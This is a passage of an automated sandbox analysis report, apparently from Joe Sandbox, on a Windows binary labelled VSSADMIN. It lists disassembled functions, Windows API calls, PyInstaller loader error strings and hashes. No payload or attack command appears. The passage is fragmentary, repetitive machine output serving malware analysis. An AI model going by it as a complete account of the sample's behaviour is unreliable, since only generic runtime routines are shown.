                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF614C7D1CA,?,?,?,00007FF614C7CEBC,?,?,00000001,00007FF614C7CAD9), ref: 00007FF614C7D027
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                                                                      • Opcode ID: 96cc8d1137d818a2009be7de16c2cee15406677aaf285b7c4d33305375866f21
                                                                                                                                                                      • Instruction ID: 09a2d82cc85ce2739dfa8aa615a07dd884f482aea23070680b49e0b6b8009704
                                                                                                                                                                      • Opcode Fuzzy Hash: 96cc8d1137d818a2009be7de16c2cee15406677aaf285b7c4d33305375866f21
                                                                                                                                                                      • Instruction Fuzzy Hash: 9731BE22A1EE4292EE519B06A88097523F4FF4AFB5F591536DD1ECB390EF3CE4468710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C764A0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF614C77A60: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF614C726FB), ref: 00007FF614C77A9A
                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF614C767F1,?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C764FF
                                                                                                                                                                        • Part of subcall function 00007FF614C72770: MessageBoxW.USER32 ref: 00007FF614C72845
                                                                                                                                                                      Strings
                                                                                                                                                                      • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF614C76513
                                                                                                                                                                      • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF614C764D6
                                                                                                                                                                      • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF614C7655A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                      • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                                                                      • API String ID: 1662231829-3498232454
                                                                                                                                                                      • Opcode ID: 5c20c095824c1da7d1f4bea3d05580988457242eeef08c03b39c26993512e69f
                                                                                                                                                                      • Instruction ID: 5329e482434e14f76dc2ae72854091868df9aaaebfc69258aac4c527fd38dbe9
                                                                                                                                                                      • Opcode Fuzzy Hash: 5c20c095824c1da7d1f4bea3d05580988457242eeef08c03b39c26993512e69f
                                                                                                                                                                      • Instruction Fuzzy Hash: 21318911B1CF8352FA609725E9D53BA6171AF9AFE1F844033DA4EC379AEE2DE5049700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C77A60 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF614C726FB), ref: 00007FF614C77A9A
                                                                                                                                                                        • Part of subcall function 00007FF614C72620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF614C77774,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C72654
                                                                                                                                                                        • Part of subcall function 00007FF614C72620: MessageBoxW.USER32 ref: 00007FF614C72730
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF614C726FB), ref: 00007FF614C77B20
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                      • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                      • API String ID: 3723044601-876015163
                                                                                                                                                                      • Opcode ID: ef0c7189470ede6921ef3de76a81d580bff1fc53629992aced72f99ea96e9165
                                                                                                                                                                      • Instruction ID: 717150f64954594f96bb834c5812009267792c145566cc19a8c116bdf769a571
                                                                                                                                                                      • Opcode Fuzzy Hash: ef0c7189470ede6921ef3de76a81d580bff1fc53629992aced72f99ea96e9165
                                                                                                                                                                      • Instruction Fuzzy Hash: 59215526B0CE4292EB50DB19F480069A3B1FB86BE8F584137DB5CC3B69EE2DE5518700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8A650 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A65F
                                                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A674
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A695
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A6C2
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A6D3
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A6E4
                                                                                                                                                                      • SetLastError.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A6FF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                      • Opcode ID: 9603f04e73c1ac35bebd6b74082c40ddb301c2cc90fbe29b07207277116e1379
                                                                                                                                                                      • Instruction ID: 0c761902a80d3848f273854b2926a9bb2ad5779016771e9b17685e10aa081245
                                                                                                                                                                      • Opcode Fuzzy Hash: 9603f04e73c1ac35bebd6b74082c40ddb301c2cc90fbe29b07207277116e1379
                                                                                                                                                                      • Instruction Fuzzy Hash: 10218B24B0CE4342FA58672996C517A62725F4AFB4F180737E93EC77DAEE2DB441A700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C9709C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                      • String ID: CONOUT$
                                                                                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                                                                                      • Opcode ID: 8e0e590b76c227ed4e0945dd3cc989df51f43b4687c0318c0d05d3449c58233d
                                                                                                                                                                      • Instruction ID: 342ce6e1e1fb8e72f295e9ca9060615c825662d53de512ff67ff20a91df6bdd1
                                                                                                                                                                      • Opcode Fuzzy Hash: 8e0e590b76c227ed4e0945dd3cc989df51f43b4687c0318c0d05d3449c58233d
                                                                                                                                                                      • Instruction Fuzzy Hash: F7119025B18E8286E7508B56F89432972B0FB89FF8F540236EA5EC77A4DF3ED5148740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8A7C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF614C8447D,?,?,?,?,00007FF614C8DDD7,?,?,00000000,00007FF614C8A8E6,?,?,?), ref: 00007FF614C8A7D7
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C8447D,?,?,?,?,00007FF614C8DDD7,?,?,00000000,00007FF614C8A8E6,?,?,?), ref: 00007FF614C8A80D
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C8447D,?,?,?,?,00007FF614C8DDD7,?,?,00000000,00007FF614C8A8E6,?,?,?), ref: 00007FF614C8A83A
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C8447D,?,?,?,?,00007FF614C8DDD7,?,?,00000000,00007FF614C8A8E6,?,?,?), ref: 00007FF614C8A84B
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C8447D,?,?,?,?,00007FF614C8DDD7,?,?,00000000,00007FF614C8A8E6,?,?,?), ref: 00007FF614C8A85C
                                                                                                                                                                      • SetLastError.KERNEL32(?,?,?,00007FF614C8447D,?,?,?,?,00007FF614C8DDD7,?,?,00000000,00007FF614C8A8E6,?,?,?), ref: 00007FF614C8A877
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                      • Opcode ID: 8dfa007eb70710ac51225e31542f24e155c530b6ee80d7af8a446e0989fc2ffe
                                                                                                                                                                      • Instruction ID: 6c5ca6c08872f62a718d612997aa6df4b715a143c14ce02ef574d144d6167ecd
                                                                                                                                                                      • Opcode Fuzzy Hash: 8dfa007eb70710ac51225e31542f24e155c530b6ee80d7af8a446e0989fc2ffe
                                                                                                                                                                      • Instruction Fuzzy Hash: BF118E24F0CE4742FA18572996C517A21729F47FB0F144336E92EC77D6EE2DE4026710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C7C8D8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                      • String ID: csm$f
                                                                                                                                                                      • API String ID: 2395640692-629598281
                                                                                                                                                                      • Opcode ID: 752f63a6eb654042196f5a98f7ed0cc27864ab03d65b16a783a14cfa4978e18e
                                                                                                                                                                      • Instruction ID: a248c42de3bc9d8e642e4a5ab875f693969a78506d1565703df18c64de22cdf8
                                                                                                                                                                      • Opcode Fuzzy Hash: 752f63a6eb654042196f5a98f7ed0cc27864ab03d65b16a783a14cfa4978e18e
                                                                                                                                                                      • Instruction Fuzzy Hash: 9D519132A1DA0387E754CF15E484A2D37A5FB46FAAF508132DA4A87748EF38E941C704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C72240 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                      • String ID: Unhandled exception in script
                                                                                                                                                                      • API String ID: 3081866767-2699770090
                                                                                                                                                                      • Opcode ID: 4bccdd4631ef4db3dc50da95ea376d441cf7280d9b9e9edacee6198ae8bfc666
                                                                                                                                                                      • Instruction ID: 8d5ede278d034fde43ca452e616bc6d53117661fb95187da014c9fb4eb46146e
                                                                                                                                                                      • Opcode Fuzzy Hash: 4bccdd4631ef4db3dc50da95ea376d441cf7280d9b9e9edacee6198ae8bfc666
                                                                                                                                                                      • Instruction Fuzzy Hash: F031427260CA8299EB24DF65E8951F96370FF8AB94F400136EA4D8BB56DF3DD145C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C72620 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF614C77774,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C72654
                                                                                                                                                                        • Part of subcall function 00007FF614C774E0: GetLastError.KERNEL32(00000000,00007FF614C7269E,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C77507
                                                                                                                                                                        • Part of subcall function 00007FF614C774E0: FormatMessageW.KERNEL32 ref: 00007FF614C77536
                                                                                                                                                                        • Part of subcall function 00007FF614C77A60: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF614C726FB), ref: 00007FF614C77A9A
                                                                                                                                                                      • MessageBoxW.USER32 ref: 00007FF614C72730
                                                                                                                                                                      • MessageBoxA.USER32 ref: 00007FF614C7274C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                                                                                                                      • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                      • API String ID: 2806210788-2410924014
                                                                                                                                                                      • Opcode ID: 7890d9f144e33e33d69a38586b169397518973d2a5b1a440a20cff3164d3e9e8
                                                                                                                                                                      • Instruction ID: a14333e64394f4d7aec91c6de1b8a0ec33d43a700be5e5ed5aafd33a599e2923
                                                                                                                                                                      • Opcode Fuzzy Hash: 7890d9f144e33e33d69a38586b169397518973d2a5b1a440a20cff3164d3e9e8
                                                                                                                                                                      • Instruction Fuzzy Hash: C131647262CEC292EA309B14E4916EA6374FF85B94F405037E68D83A59DF3DD745CB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C88910 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                      • Opcode ID: 1edae9836d644cf3f37344bb8067f5d3e72c30a74e7bf89e7e9475504bb25611
                                                                                                                                                                      • Instruction ID: e52832263dd51c3d50f8a8cb14844fbee443b16ab54c14f4669ffdd6260e5c8f
                                                                                                                                                                      • Opcode Fuzzy Hash: 1edae9836d644cf3f37344bb8067f5d3e72c30a74e7bf89e7e9475504bb25611
                                                                                                                                                                      • Instruction Fuzzy Hash: 57F04F65A19E4291EF108B24E48533A5330AF86FB5F540637D56E87AF4DF2ED548C310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C987D4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                      • Opcode ID: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                                                                      • Instruction ID: df903f3215afb40246e66390c7a8782672b61de48a1f20f8636c4cf7020c10d8
                                                                                                                                                                      • Opcode Fuzzy Hash: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                                                                      • Instruction Fuzzy Hash: 87119122E38E03E5F6541564D4C237720616F57BFCF140A36EA7E876EACE3EA8418138
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8A890 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF614C89AA3,?,?,00000000,00007FF614C89D3E,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C8A8AF
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C89AA3,?,?,00000000,00007FF614C89D3E,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C8A8CE
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C89AA3,?,?,00000000,00007FF614C89D3E,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C8A8F6
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C89AA3,?,?,00000000,00007FF614C89D3E,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C8A907
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C89AA3,?,?,00000000,00007FF614C89D3E,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C8A918
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                      • Opcode ID: 03277c719d17d560c79db32ac0887211ffe2f08df489d569bf0de2f6ccb26345
